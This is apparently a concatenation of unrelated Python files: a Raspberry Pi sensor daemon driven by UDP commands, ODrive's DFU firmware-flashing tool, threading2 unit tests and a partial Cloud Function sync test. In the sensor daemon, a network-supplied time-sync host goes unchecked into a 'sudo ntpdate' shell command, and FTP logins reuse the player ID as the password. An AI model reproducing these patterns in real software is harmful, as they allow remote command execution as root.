# def get_measurements_thread(self, socket, response_address, mpu9250, measurement_thread_kwargs):
# measurements_thread = MeasurementsThread(
# socket,
# response_address,
# mpu9250,
# **measurement_thread_kwargs,
# )
#
# return measurements_thread
@staticmethod
def time_sync(time_sync_source):
print('Synchronizing time')
os.system('sudo ntpdate ' + time_sync_source)
def run(self):
measurements_thread = None
measurements_threads_folders = []
time_sync_source = 'ntp1.stratum1.ru'
state = 'idle'
msg_num_last = None
while True:
# time.sleep(1)
# msg = '1'
# UDP_PORT = 61070
# # UDP_IP = "192.168.1.236"
# UDP_IP = "255.255.255.255"
# self.status_thread.send("4", (UDP_IP, UDP_PORT))
# print(i, time.time())
# time.sleep(0.1)
msg, addr = self.socket.recvfrom(1024) # buffer size is 1024 bytes # чекнуть какой таймаут
msg = msg.decode()
print("received message:", msg)
print("sender:", addr)
# sender_ip = addr[0]
# response_address = (sender_ip, self.UDP_PORT_SEND)
# continue
msg_parts = msg.split(',')
try:
msg_num = int(msg_parts[0])
except :
print("Can't parse msg '" + msg + "'")
continue
# TODO: add acknownledgement responses
if msg_num == 1: # Reset
ack_response_num = str(msg_num) if msg_num != msg_num_last else '0'
for _ in range(1):
self.acknowledgement_thread.send(ack_response_num + ',' + __version__)
if (measurements_thread is not None) and measurements_thread.is_alive():
self.stop_measurements(measurements_thread)
measurements_thread = None
self.status_thread.periodic_sending = False
self.time_thread.periodic_sending = True # Changed to TRUE on 4 July
# self.time_thread.periodic_sending = False
self.package_num = 0
time_sync_source = 'ntp1.stratum1.ru'
state = 'idle'
elif msg_num == 2: # Start
ack_response_num = str(msg_num) if msg_num != msg_num_last else '0'
for _ in range(1):
time.sleep(0.050)
self.acknowledgement_thread.send(ack_response_num)
if (measurements_thread is not None) and measurements_thread.is_alive():
# self.stop_measurements(measurements_thread) ### IMPORTANT COMMENT. UNCOMMENT IF YOU WANT A SEPARATE FILE FOR EACH START
continue
measurements_thread = MeasurementsThread(
self.sockets['client']['data'], # It should be 'data' socket, right? # Also should be simplified
self.addresses['server']['data'],
# ('255.255.255.255', 63070),
# self.sockets['client']['data'], # It should be 'data' socket, right? # Also should be simplified
# self.addresses['server']['data'],
self.mpu9250,
self.ftp_thread,
# **self.measurement_thread_kwargs,
self.measurement_thread_kwargs,
package_num=self.package_num,
)
# measurements_thread = self.get_measurements_thread(
# socket=self.socket,
# response_address=self.addresses['server']['data'],
# mpu9250=self.mpu9250,
# measurement_thread_kwargs=self.measurement_thread_kwargs,
# )
# measurements_thread.stop = False
# measurements_thread = get_measurements_thread()
measurements_thread.start()
self.status_thread.periodic_sending = True
state = 'measuring'
measurements_threads_folders.append(measurements_thread.folder)
print('I am measuring')
elif msg_num == 3: # Stop
ack_response_num = str(msg_num) if msg_num != msg_num_last else '0'
for _ in range(1):
time.sleep(0.100)
self.acknowledgement_thread.send(ack_response_num)
self.stop_measurements(measurements_thread)
self.status_thread.periodic_sending = False
state = 'idle'
elif msg_num == 4: # Time sync
ack_response_num = str(msg_num) if msg_num != msg_num_last else '0'
for _ in range(1):
self.acknowledgement_thread.send(ack_response_num + ',0')
# print(self.acknowledgement_thread)
thread = Thread(target=self.time_sync, args=(time_sync_source, ))
thread.start()
elif msg_num == 5: # Time sync source
ack_response_num = str(msg_num) if msg_num != msg_num_last else '0'
for _ in range(1):
self.acknowledgement_thread.send(ack_response_num)
if len(msg_parts) >= 2:
new_time_sync_source = msg_parts[1]
try:
time_sync_source = str(new_time_sync_source)
except:
print('Fail to set the new time_sync_source')
elif msg_num == 6: # Start time sending # Looks like it's deprecated now
ack_response_num = str(msg_num) if msg_num != msg_num_last else '0'
for _ in range(1):
self.acknowledgement_thread.send(ack_response_num)
self.time_thread.periodic_sending = True
# Double check because of name
elif msg_num == 7: # State
ack_response_num = str(msg_num) if msg_num != msg_num_last else '0'
for _ in range(1):
self.acknowledgement_thread.send(ack_response_num + ',' + state)
elif msg_num == 8: # Send last measurement data
ack_response_num = str(msg_num) if msg_num != msg_num_last else '0'
for _ in range(1):
self.acknowledgement_thread.send(ack_response_num)
# TODO: add try/except
ftp_ip = msg_parts[1] # ftp_ip = '192.168.1.100'
# session_ftp = FTP('192.168.1.100', 'ADMIN', 'aaa')
for measurements_threads_folder in measurements_threads_folders:
folder = measurements_threads_folder
# session.login('ADMIN', 'aaa')
if folder is not None:
# os.listdir()
full_path = '/home/pi/data/' + folder + '/'
df_total = get_df_total(folder=full_path) # TODO: ENABLE IT
### df to bytes
path2save = '/home/pi/tmp/current_df.csv'
df_total.to_csv(path2save, index=False)
# file_prefix = folder[:19].replace(':', '-')
file_prefix = time_format2timefile_format(folder)
ftp_filename = 'chair__' + file_prefix + '.csv'
session_ftp = FTP(ftp_ip, self.player_id, self.player_id)
send_via_ftp(session_ftp, path2save, ftp_filename)
session_ftp.quit()
else:
print('measurements_thread_entity.folder is None. We need a file in a folder to send via FTP')
else:
measurements_threads_folders = []
elif msg_num == 9: # Looks like it's deprecated now
ack_response_num = str(msg_num) if msg_num != msg_num_last else '0'
for _ in range(1):
self.acknowledgement_thread.send(ack_response_num)
if len(msg_parts) != 3:
print('Incorrect number of parts: ' + str(len(msg_parts)))
continue
ip_server_new = msg_parts[1]
player_id_new = msg_parts[2]
ports, addresses, sockets = get_ports_adresses_sockets(channels_dict, '07', player_id_new, ip_server_new, get_server_sockets=False, get_client_sockets=False)
self.status_thread.opponent_address = addresses['server']['status']
self.time_thread.opponent_address = addresses['server']['time']
self.acknowledgement_thread.opponent_address = addresses['server']['ack']
if measurements_thread is not None:
# measurements_thread.socket = sockets['client']
measurements_thread.response_address = addresses['server']['data']
self.addresses = addresses
print('ip and player_id are updated to ' + ip_server_new + ' , ' + player_id_new)
# self.sockets = sockets
# self.socket = sockets['client']['cmd']
# get_socket(ip_server, ports['server'][channel_name]) # Add for client too
msg_num_last = msg_num
|
dfu.py
|
#!/usr/bin/env python
"""
Tool for flashing .hex files to the ODrive via the STM built-in USB DFU mode.
"""
from __future__ import print_function
import argparse
import sys
import time
import threading
import platform
import struct
import requests
import re
import io
import os
import usb.core
import fibre
import odrive
from odrive.utils import Event, OperationAbortedException
from odrive.dfuse import *
if sys.version_info < (3, 0):
_print = print
def print(*vals, **kwargs):
_print(*vals)
if kwargs.get('flush', False):
sys.stdout.flush()
try:
from intelhex import IntelHex
except:
sudo_prefix = "" if platform.system() == "Windows" else "sudo "
print("You need intelhex for this ({}pip install IntelHex)".format(sudo_prefix), file=sys.stderr)
sys.exit(1)
def get_fw_version_string(fw_version):
if (fw_version[0], fw_version[1], fw_version[2]) == (0, 0, 0):
return "[unknown version]"
else:
return "v{}.{}.{}{}".format(fw_version[0], fw_version[1], fw_version[2], "-dev" if fw_version[3] else "")
def get_hw_version_string(hw_version):
if hw_version == (0, 0, 0):
return "[unknown version]"
else:
return "v{}.{}{}".format(hw_version[0], hw_version[1], ("-" + str(hw_version[2]) + "V") if hw_version[2] > 0 else "")
def populate_sectors(sectors, hexfile):
"""
Checks for which on-device sectors there is data in the hex file and
returns a (sector, data) tuple for each touched sector where data
is a byte array of the same size as the sector.
"""
for sector in sectors:
addr = sector['addr']
size = sector['len']
# check if any segment from the hexfile overlaps with this sector
touched = False
for (start, end) in hexfile.segments():
if start < addr and end > addr:
touched = True
break
elif start >= addr and start < addr + size:
touched = True
break
if touched:
# TODO: verify if the section is writable
yield (sector, hexfile.tobinarray(addr, addr + size - 1))
def get_first_mismatch_index(array1, array2):
"""
Compares two arrays and returns the index of the
first unequal item or None if both arrays are equal
"""
if len(array1) != len(array2):
raise Exception("arrays must be same size")
for pos in range(len(array1)):
if (array1[pos] != array2[pos]):
return pos
return None
def dump_otp(dfudev):
"""
Dumps the contents of the one-time-programmable
memory for debugging purposes.
The OTP is used to determine the board version.
"""
# 512 Byte OTP
otp_sector = [s for s in dfudev.sectors if s['name'] == 'OTP Memory' and s['addr'] == 0x1fff7800][0]
data = dfudev.read_sector(otp_sector)
print(' '.join('{:02X}'.format(x) for x in data))
# 16 lock bytes
otp_lock_sector = [s for s in dfudev.sectors if s['name'] == 'OTP Memory' and s['addr'] == 0x1fff7A00][0]
data = dfudev.read_sector(otp_lock_sector)
print(' '.join('{:02X}'.format(x) for x in data))
class Firmware():
def __init__(self):
self.fw_version = (0, 0, 0, True)
self.hw_version = (0, 0, 0)
@staticmethod
def is_newer(a, b):
a_num = (a[0], a[1], a[2])
b_num = (b[0], b[1], b[2])
if a_num == (0, 0, 0) or b_num == (0, 0, 0):
return False # Cannot compare unknown versions
return a_num > b_num or (a_num == b_num and not a[3] and b[3])
def __gt__(self, other):
"""
Compares two firmware versions. If both versions are equal, the
prerelease version is considered older than the release version.
"""
if not isinstance(other, tuple):
other = other.fw_version
return Firmware.is_newer(self.fw_version, other)
def __lt__(self, other):
"""
Compares two firmware versions. If both versions are equal, the
prerelease version is considered older than the release version.
"""
if not isinstance(other, tuple):
other = other.fw_version
return Firmware.is_newer(other, self.fw_version)
def is_compatible(self, hw_version):
"""
Determines if this firmware is compatible
with the specified hardware version
"""
return self.hw_version == hw_version
class FirmwareFromGithub(Firmware):
"""
Represents a firmware asset
"""
def __init__(self, release_json, asset_json):
Firmware.__init__(self)
if release_json['draft'] or release_json['prerelease']:
release_json['tag_name'] += "*"
self.fw_version = odrive.version.version_str_to_tuple(release_json['tag_name'])
hw_version_regex = r'.*v([0-9]+).([0-9]+)(-(?P<voltage>[0-9]+)V)?.hex'
hw_version_match = re.search(hw_version_regex, asset_json['name'])
self.hw_version = (int(hw_version_match.group(1)),
int(hw_version_match.group(2)),
int(hw_version_match.groupdict().get('voltage') or 0))
self.github_asset_id = asset_json['id']
self.hex = None
# no technical reason to fetch this - just interesting
self.download_count = asset_json['download_count']
def get_as_hex(self):
"""
Returns the content of the firmware in as a binary array in Intel Hex format
"""
if self.hex is None:
print("Downloading firmware {}...".format(get_fw_version_string(self.fw_version)))
response = requests.get('https://api.github.com/repos/madcowswe/ODrive/releases/assets/' + str(self.github_asset_id),
headers={'Accept': 'application/octet-stream'})
if response.status_code != 200:
raise Exception("failed to download firmware")
self.hex = response.content
return io.StringIO(self.hex.decode('utf-8'))
class FirmwareFromFile(Firmware):
def __init__(self, file):
Firmware.__init__(self)
self._file = file
def get_as_hex(self):
return self._file
def get_all_github_firmwares():
response = requests.get('https://api.github.com/repos/madcowswe/ODrive/releases')
if response.status_code != 200:
raise Exception("could not fetch releases")
response_json = response.json()
for release_json in response_json:
for asset_json in release_json['assets']:
try:
if asset_json['name'].lower().endswith('.hex'):
fw = FirmwareFromGithub(release_json, asset_json)
yield fw
except Exception as ex:
print(ex)
def get_newest_firmware(hw_version):
"""
Returns the newest available firmware for the specified hardware version
"""
firmwares = get_all_github_firmwares()
firmwares = filter(lambda fw: not fw.fw_version[3], firmwares) # ignore prereleases
firmwares = filter(lambda fw: fw.hw_version == hw_version, firmwares)
firmwares = list(firmwares)
firmwares.sort()
return firmwares[-1] if len(firmwares) else None
def show_deferred_message(message, cancellation_token):
"""
Shows a message after 10s, unless cancellation_token gets set.
"""
def show_message_thread(message, cancellation_token):
for _ in range(1,10):
if cancellation_token.is_set():
return
time.sleep(1)
if not cancellation_token.is_set():
print(message)
t = threading.Thread(target=show_message_thread, args=(message, cancellation_token))
t.daemon = True
t.start()
def put_into_dfu_mode(device, cancellation_token):
"""
Puts the specified device into DFU mode
"""
if not hasattr(device, "enter_dfu_mode"):
print("The firmware on device {:08X} cannot soft enter DFU mode.\n"
"Please remove power, put the DFU switch into DFU mode,\n"
"then apply power again. Then try again.\n"
"If it still doesn't work, you can try to use the DeFuse app or \n"
"dfu-util, see the odrive documentation.\n"
"You can also flash the firmware using STLink (`make flash`)"
.format(device.serial_number))
return
print("Putting device {:08X} into DFU mode...".format(device.serial_number))
try:
device.enter_dfu_mode()
except fibre.ObjectLostError:
pass # this is expected because the device reboots
if platform.system() == "Windows":
show_deferred_message("Still waiting for the device to reappear.\n"
"Use the Zadig utility to set the driver of 'STM32 BOOTLOADER' to libusb-win32.",
cancellation_token)
def find_device_in_dfu_mode(serial_number, cancellation_token):
"""
Polls libusb until a device in DFU mode is found
"""
while not cancellation_token.is_set():
params = {} if serial_number == None else {'serial_number': serial_number}
stm_device = usb.core.find(idVendor=0x0483, idProduct=0xdf11, **params)
if stm_device != None:
return stm_device
time.sleep(1)
return None
def update_device(device, firmware, logger, cancellation_token):
"""
Updates the specified device with the specified firmware.
The device passed to this function can either be in
normal mode or in DFU mode.
The firmware should be an instance of Firmware or None.
If firmware is None, the newest firmware for the device is
downloaded from GitHub releases.
"""
if isinstance(device, usb.core.Device):
found_in_dfu = True
serial_number = device.serial_number
dfudev = DfuDevice(device)
if (logger._verbose):
logger.debug("OTP:")
dump_otp(dfudev)
# Read hardware version from one-time-programmable memory
otp_sector = [s for s in dfudev.sectors if s['name'] == 'OTP Memory' and s['addr'] == 0x1fff7800][0]
otp_data = dfudev.read_sector(otp_sector)
if otp_data[0] == 0:
otp_data = otp_data[16:]
if otp_data[0] == 0xfe:
hw_version = (otp_data[3], otp_data[4], otp_data[5])
else:
hw_version = (0, 0, 0)
else:
found_in_dfu = False
serial_number = "{:08X}".format(device.serial_number)
dfudev = None
# Read hardware version as reported from firmware
hw_version_major = device.hw_version_major if hasattr(device, 'hw_version_major') else 0
hw_version_minor = device.hw_version_minor if hasattr(device, 'hw_version_minor') else 0
hw_version_variant = device.hw_version_variant if hasattr(device, 'hw_version_variant') else 0
hw_version = (hw_version_major, hw_version_minor, hw_version_variant)
if hw_version < (3, 5, 0):
print(" DFU mode is not supported on board version 3.4 or earlier.")
print(" This is because entering DFU mode on such a device would")
print(" break the brake resistor FETs under some circumstances.")
print("Warning: DFU mode is not supported on ODrives earlier than v3.5 unless you perform a hardware mod.")
if not odrive.utils.yes_no_prompt("Do you still want to continue?", False):
raise OperationAbortedException()
fw_version_major = device.fw_version_major if hasattr(device, 'fw_version_major') else 0
fw_version_minor = device.fw_version_minor if hasattr(device, 'fw_version_minor') else 0
fw_version_revision = device.fw_version_revision if hasattr(device, 'fw_version_revision') else 0
fw_version_prerelease = device.fw_version_prerelease if hasattr(device, 'fw_version_prerelease') else True
fw_version = (fw_version_major, fw_version_minor, fw_version_revision, fw_version_prerelease)
print("Found ODrive {} ({}) with firmware {}{}".format(
serial_number,
get_hw_version_string(hw_version),
get_fw_version_string(fw_version),
" in DFU mode" if dfudev is not None else ""))
if firmware is None:
if hw_version == (0, 0, 0):
if dfudev is None:
suggestion = 'You have to manually flash an up-to-date firmware to make automatic checks work. Run `odrivetool dfu --help` for more info.'
else:
suggestion = 'Run "make write_otp" to program the board version.'
raise Exception('Cannot check online for new firmware because the board version is unknown. ' + suggestion)
print("Checking online for newest firmware...", end='')
firmware = get_newest_firmware(hw_version)
if firmware is None:
raise Exception("could not find any firmware release for this board version")
print(" found {}".format(get_fw_version_string(firmware.fw_version)))
if firmware.fw_version <= fw_version:
print()
if firmware.fw_version < fw_version:
print("Warning: you are about to flash firmware {} which is older than the firmware on the device ({}).".format(
get_fw_version_string(firmware.fw_version),
get_fw_version_string(fw_version)))
else:
print("You are about to flash firmware {} which is the same version as the firmware on the device ({}).".format(
get_fw_version_string(firmware.fw_version),
get_fw_version_string(fw_version)))
if not odrive.utils.yes_no_prompt("Do you want to flash this firmware anyway?", False):
raise OperationAbortedException()
# load hex file
# TODO: Either use the elf format or pack a custom format with a manifest.
# This way we can for instance verify the target board version and only
# have to publish one file for every board (instead of elf AND hex files).
hexfile = IntelHex(firmware.get_as_hex())
logger.debug("Contiguous segments in hex file:")
for start, end in hexfile.segments():
logger.debug(" {:08X} to {:08X}".format(start, end - 1))
# Back up configuration
do_backup_config = False
if dfudev is None:
do_backup_config = device.user_config_loaded if hasattr(device, 'user_config_loaded') else False
if do_backup_config:
odrive.configuration.backup_config(device, None, logger)
elif not odrive.utils.yes_no_prompt("The configuration cannot be backed up because the device is already in DFU mode. The configuration may be lost after updating. Do you want to continue anyway?", True):
raise OperationAbortedException()
# Put the device into DFU mode if it's not already in DFU mode
if dfudev is None:
find_odrive_cancellation_token = Event(cancellation_token)
put_into_dfu_mode(device, find_odrive_cancellation_token)
stm_device = find_device_in_dfu_mode(serial_number, cancellation_token)
find_odrive_cancellation_token.set()
dfudev = DfuDevice(stm_device)
logger.debug("Sectors on device: ")
for sector in dfudev.sectors:
logger.debug(" {:08X} to {:08X} ({})".format(
sector['addr'],
sector['addr'] + sector['len'] - 1,
sector['name']))
# fill sectors with data
touched_sectors = list(populate_sectors(dfudev.sectors, hexfile))
logger.debug("The following sectors will be flashed: ")
for sector,_ in touched_sectors:
logger.debug(" {:08X} to {:08X}".format(sector['addr'], sector['addr'] + sector['len'] - 1))
# Erase
try:
internal_flash_sectors = [sector for sector in dfudev.sectors if sector['name'] == 'Internal Flash']
for i, sector in enumerate(dfudev.sectors):
if sector['name'] == 'Internal Flash':
print("Erasing... (sector {}/{}) \r".format(i, len(internal_flash_sectors)), end='', flush=True)
dfudev.erase_sector(sector)
print('Erasing... done \r', end='', flush=True)
finally:
print('', flush=True)
# Flash
try:
for i, (sector, data) in enumerate(touched_sectors):
print("Flashing... (sector {}/{}) \r".format(i, len(touched_sectors)), end='', flush=True)
dfudev.write_sector(sector, data)
print('Flashing... done \r', end='', flush=True)
finally:
print('', flush=True)
# Verify
try:
for i, (sector, expected_data) in enumerate(touched_sectors):
print("Verifying... (sector {}/{}) \r".format(i, len(touched_sectors)), end='', flush=True)
observed_data = dfudev.read_sector(sector)
mismatch_pos = get_first_mismatch_index(observed_data, expected_data)
if not mismatch_pos is None:
mismatch_pos -= mismatch_pos % 16
observed_snippet = ' '.join('{:02X}'.format(x) for x in observed_data[mismatch_pos:mismatch_pos+16])
expected_snippet = ' '.join('{:02X}'.format(x) for x in expected_data[mismatch_pos:mismatch_pos+16])
raise RuntimeError("Verification failed around address 0x{:08X}:\n".format(sector['addr'] + mismatch_pos) +
" expected: " + expected_snippet + "\n"
" observed: " + observed_snippet)
print('Verifying... done \r', end='', flush=True)
finally:
print('', flush=True)
# If the flash operation failed for some reason, your device is bricked now.
# You can unbrick it as long as the device remains powered on.
# (or always with an STLink)
# So for debugging you should comment this last part out.
# Jump to application
dfudev.jump_to_application(0x08000000)
if not found_in_dfu:
logger.info("Waiting for the device to reappear...")
device = odrive.find_any(odrive.default_usb_search_path, serial_number,
cancellation_token, cancellation_token, timeout=30)
if do_backup_config:
temp_config_filename = odrive.configuration.get_temp_config_filename(device)
odrive.configuration.restore_config(device, None, logger)
os.remove(temp_config_filename)
logger.success("Device firmware update successful.")
def launch_dfu(args, logger, cancellation_token):
"""
Waits for a device that matches args.path and args.serial_number
and then upgrades the device's firmware.
"""
serial_number = args.serial_number
find_odrive_cancellation_token = Event(cancellation_token)
logger.info("Waiting for ODrive...")
devices = [None, None]
# Start background thread to scan for ODrives in DFU mode
def find_device_in_dfu_mode_thread():
devices[0] = find_device_in_dfu_mode(serial_number, find_odrive_cancellation_token)
find_odrive_cancellation_token.set()
t = threading.Thread(target=find_device_in_dfu_mode_thread)
t.daemon = True
t.start()
# Scan for ODrives not in DFU mode
# We only scan on USB because DFU is only implemented over USB
devices[1] = odrive.find_any(odrive.default_usb_search_path, serial_number,
find_odrive_cancellation_token, cancellation_token)
find_odrive_cancellation_token.set()
device = devices[0] or devices[1]
firmware = FirmwareFromFile(args.file) if args.file else None
update_device(device, firmware, logger, cancellation_token)
# Note: the flashed image can be verified using: (0x12000 is the number of bytes to read)
# $ openocd -f interface/stlink-v2.cfg -f target/stm32f4x.cfg -c init -c flash\ read_bank\ 0\ image.bin\ 0\ 0x12000 -c exit
# $ hexdump -C image.bin > image.bin.txt
#
# If you compare this with a reference image that was flashed with the STLink, you will see
# minor differences. This is because this script fills undefined sections with 0xff.
# $ diff image_ref.bin.txt image.bin.txt
# 21c21
# < *
# ---
# > 00000180 d9 47 00 08 d9 47 00 08 ff ff ff ff ff ff ff ff |.G...G..........|
# 2553c2553
# < 00009fc0 9e 46 70 47 00 00 00 00 52 20 96 3c 46 76 50 76 |.FpG....R .<FvPv|
# ---
# > 00009fc0 9e 46 70 47 ff ff ff ff 52 20 96 3c 46 76 50 76 |.FpG....R .<FvPv|
|
__init__.py
|
from __future__ import with_statement
import os
import sys
import unittest
import doctest
import random
import time
import threading2
from threading2 import *
# Grab everything needed to run standard threading test function
from threading import _test as std_threading_test
from threading import _Verbose, _sleep
from collections import deque
class TestStandard(unittest.TestCase):
"""Run standard threading testcases using our new classes."""
def test_standard(self):
exec std_threading_test.func_code in globals()
class TestSHLock(unittest.TestCase):
"""Testcases for SHLock class."""
def test_contention(self):
lock = SHLock()
done = []
def lots_of_acquires():
for _ in xrange(1000):
shared = random.choice([True,False])
lock.acquire(shared=shared)
lock.acquire(shared=shared)
time.sleep(random.random() * 0.0001)
lock.release()
time.sleep(random.random() * 0.0001)
lock.acquire(shared=shared)
time.sleep(random.random() * 0.0001)
lock.release()
lock.release()
done.append(True)
threads = [Thread(target=lots_of_acquires) for _ in xrange(3)]
for t in threads:
t.daemon = True
t.start()
for t in threads:
if not t.join(timeout=10):
raise RuntimeError("SHLock deadlock")
if len(done) != len(threads):
print done, threads
raise RuntimeError("SHLock test error")
class TestSHLockContext(unittest.TestCase):
class TestPassed(Exception): pass
@staticmethod
def raise_test_passed(): raise TestSHLockContext.TestPassed
@staticmethod
def noop(*args, **kwargs): pass
def check_args(self, passed, expected):
def f(**f_kwargs):
self.assertItemsEqual(expected.items(), f_kwargs.items(), 'Passed {} Got {} Expected {}'.format(passed, f_kwargs, expected))
raise TestSHLockContext.TestPassed
return f
def test_context_without_args(self):
lock_acquire = SHLock()
lock_acquire.acquire = TestSHLockContext.raise_test_passed
with self.assertRaises(TestSHLockContext.TestPassed):
with lock_acquire:
pass
lock_release = SHLock()
lock_release.release = TestSHLockContext.raise_test_passed
with self.assertRaises(TestSHLockContext.TestPassed):
with lock_release:
pass
def test_context_with_args(self):
for passed,expected in (
({}, {'shared':False, 'blocking':True, 'timeout':None}),
({'shared':True}, {'shared':True, 'blocking':True, 'timeout':None}),
({'blocking':False}, {'shared':False, 'blocking':False, 'timeout':None}),
({'timeout':1}, {'shared':False, 'blocking':True, 'timeout':1}),
):
lock_acquire_arg = SHLock()
lock_acquire_arg.acquire = self.check_args(passed, expected)
with self.assertRaises(TestSHLockContext.TestPassed):
with lock_acquire_arg(**passed):
pass
lock_release_arg = SHLock()
lock_acquire_arg.acquire = TestSHLockContext.noop
lock_release_arg.release = TestSHLockContext.raise_test_passed
with self.assertRaises(TestSHLockContext.TestPassed):
with lock_release_arg(**passed):
pass
class TestCPUSet(unittest.TestCase):
"""Unittests for CPUSet class."""
def test_initialisation(self):
def assertSetEquals(set1,set2):
self.assertEquals(sorted(list(set1)),sorted(list(set2)))
# Initialisation from iterables
assertSetEquals(CPUSet(),[])
assertSetEquals(CPUSet([0,3,2]),[0,2,3])
assertSetEquals(CPUSet(""),[])
assertSetEquals(CPUSet("3158"),[1,3,5,8])
assertSetEquals(CPUSet("3158"),[1,3,5,8])
# Initialisation from bitmasks
assertSetEquals(CPUSet(0),[])
assertSetEquals(CPUSet(1),[0])
assertSetEquals(CPUSet(2),[1])
assertSetEquals(CPUSet(3),[0,1])
assertSetEquals(CPUSet(4),[2])
assertSetEquals(CPUSet(5),[0,2])
assertSetEquals(CPUSet(6),[1,2])
assertSetEquals(CPUSet(7),[0,1,2])
assertSetEquals(CPUSet(1 << 7),[7])
assertSetEquals(CPUSet(1 << 127),[127])
assertSetEquals(CPUSet(1 << 128),[128])
def test_to_bitmask(self):
self.assertEquals(CPUSet().to_bitmask(),0)
self.assertEquals(CPUSet("0").to_bitmask(),1)
self.assertEquals(CPUSet("1").to_bitmask(),2)
self.assertEquals(CPUSet("01").to_bitmask(),3)
self.assertEquals(CPUSet("2").to_bitmask(),4)
self.assertEquals(CPUSet("02").to_bitmask(),5)
self.assertEquals(CPUSet("12").to_bitmask(),6)
self.assertEquals(CPUSet("012").to_bitmask(),7)
for i in xrange(100):
self.assertEquals(CPUSet(i).to_bitmask(),i)
class TestMisc(unittest.TestCase):
"""Miscellaneous test procedures."""
def test_docstrings(self):
"""Test threading2 docstrings."""
assert doctest.testmod(threading2)[0] == 0
def test_README(self):
"""Ensure that the README is in sync with the docstring.
This test should always pass; if the README is out of sync it just
updates it with the contents of threading2.__doc__.
"""
dirname = os.path.dirname
readme = os.path.join(dirname(dirname(dirname(__file__))),"README.txt")
if not os.path.isfile(readme):
f = open(readme,"wb")
f.write(threading2.__doc__)
f.close()
else:
f = open(readme,"rb")
if f.read() != threading2.__doc__:
f.close()
f = open(readme,"wb")
f.write(threading2.__doc__)
f.close()
|
main_test.py
|
# Copyright 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
################################################################################
"""Unit tests for Cloud Function sync, which syncs the list of github projects
and uploads them to the Cloud Datastore."""
from collections import namedtuple
import os
import subprocess
import threading
import unittest
import requests
from google.cloud import ndb
from main import get_access_token
from main import get_projects
from main import sync_projects
from main import Project
_EMULATOR_TIMEOUT = 20
_DATASTORE_READY_INDICATOR = b'is now running'
_DATASTORE_EMULATOR_PORT = 8432
_TEST_PROJECT_ID = 'test-project'
ProjectMetadata = namedtuple('ProjectMetadata', 'schedule')
def start_datastore_emulator():
"""Start Datastore emulator."""
return subprocess.Popen([
'gcloud',
'beta',
'emulators',
'datastore',
'start',
'--consistency=1.0',
'--host-port=localhost:' + str(_DATASTORE_EMULATOR_PORT),
'--project=' + _TEST_PROJECT_ID,
'--no-store-on-disk',
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
def _wait_for_emulator_ready(proc,
emulator,
indicator,
timeout=_EMULATOR_TIMEOUT):
"""Wait for emulator to be ready."""
def _read_thread(proc, ready_event):
"""Thread to continuously read from the process stdout."""
ready = False
while True:
line = proc.stdout.readline()
if not line:
break
if not ready and indicator in line:
ready = True
ready_event.set()
# Wait for process to become ready.
ready_event = threading.Event()
thread = threading.Thread(target=_read_thread, args=(proc, ready_event))
thread.daemon = True
thread.start()
if not ready_event.wait(timeout):
raise RuntimeError(
'{} emulator did not get ready in time.'.format(emulator))
return thread
# pylint: disable=too-few-public-methods
class Repository:
"""Mocking Github Repository."""
def __init__(self, name, file_type, path, contents=None):
self.contents = contents or []
self.name = name
self.type = file_type
self.path = path
self.decoded_content = b"name: test"
def get_contents(self, path):
""""Get contents of repository."""
if self.path == path:
return self.contents
for content_file in self.contents:
if content_file.path == path:
return content_file.contents
return None
def set_yaml_contents(self, decoded_content):
"""Set yaml_contents."""
self.decoded_content = decoded_content
class CloudSchedulerClient:
"""Mocking cloud scheduler client."""
def __init__(self):
self.schedulers = []
# pylint: disable=no-self-use
def location_path(self, project_id, location_id):
"""Return project path."""
return 'projects/{}/location/{}'.format(project_id, location_id)
def create_job(self, parent, job):
"""Simulate create job."""
del parent
if job['name'] not in self.schedulers:
self.schedulers.append(job)
# pylint: disable=no-self-use
def job_path(self, project_id, location_id, name):
"""Return job path."""
return 'projects/{}/location/{}/jobs/{}'.format(project_id, location_id,
name)
def delete_job(self, name):
"""Simulate delete jobs."""
for job in self.schedulers:
if job['name'] == name:
self.schedulers.remove(job)
break
def update(self, job, update_mask):
"""Simulate update jobs."""
for existing_job in self.schedulers:
if existing_job == job:
job['schedule'] = update_mask['schedule']
class TestDataSync(unittest.TestCase):
"""Unit tests for sync."""
@classmethod
def setUpClass(cls):
ds_emulator = start_datastore_emulator()
_wait_for_emulator_ready(ds_emulator, 'datastore',
_DATASTORE_READY_INDICATOR)
os.environ['DATASTORE_EMULATOR_HOST'] = 'localhost:' + str(
_DATASTORE_EMULATOR_PORT)
os.environ['GOOGLE_CLOUD_PROJECT'] = _TEST_PROJECT_ID
os.environ['DATASTORE_DATASET'] = _TEST_PROJECT_ID
os.environ['GCP_PROJECT'] = 'test-project'
os.environ['FUNCTION_REGION'] = 'us-central1'
def setUp(self):
req = requests.post(
'http://localhost:{}/reset'.format(_DATASTORE_EMULATOR_PORT))
req.raise_for_status()
def test_sync_projects_update(self):
"""Testing sync_projects() updating a schedule."""
client = ndb.Client()
cloud_scheduler_client = CloudSchedulerClient()
with client.context():
Project(name='test1', schedule='0 8 * * *').put()
Project(name='test2', schedule='0 9 * * *').put()
projects = {
'test1': ProjectMetadata('0 8 * * *'),
'test2': ProjectMetadata('0 7 * * *')
}
sync_projects(cloud_scheduler_client, projects)
projects_query = Project.query()
self.assertEqual({
'test1': '0 8 * * *',
'test2': '0 7 * * *'
}, {project.name: project.schedule for project in projects_query})
def test_sync_projects_create(self):
""""Testing sync_projects() creating new schedule."""
client = ndb.Client()
cloud_scheduler_client = CloudSchedulerClient()
with client.context():
Project(name='test1', schedule='0 8 * * *').put()
projects = {
'test1': ProjectMetadata('0 8 * * *'),
'test2': ProjectMetadata('0 7 * * *')
}
sync_projects(cloud_scheduler_client, projects)
projects_query = Project.query()
self.assertEqual({
'test1': '0 8 * * *',
'test2': '0 7 * * *'
}, {project.name: project.schedule for project in projects_query})
def test_sync_projects_delete(self):
"""Testing sync_projects() deleting."""
client = ndb.Client()
cloud_scheduler_client = CloudSchedulerClient()
with client.context():
Project(name='test1', schedule='0 8 * * *').put()
Project(name='test2', schedule='0 9 * * *').put()
projects = {'test1': ProjectMetadata('0 8 * * *')}
sync_projects(cloud_scheduler_client, projects)
projects_query = Project.query()
self.assertEqual(
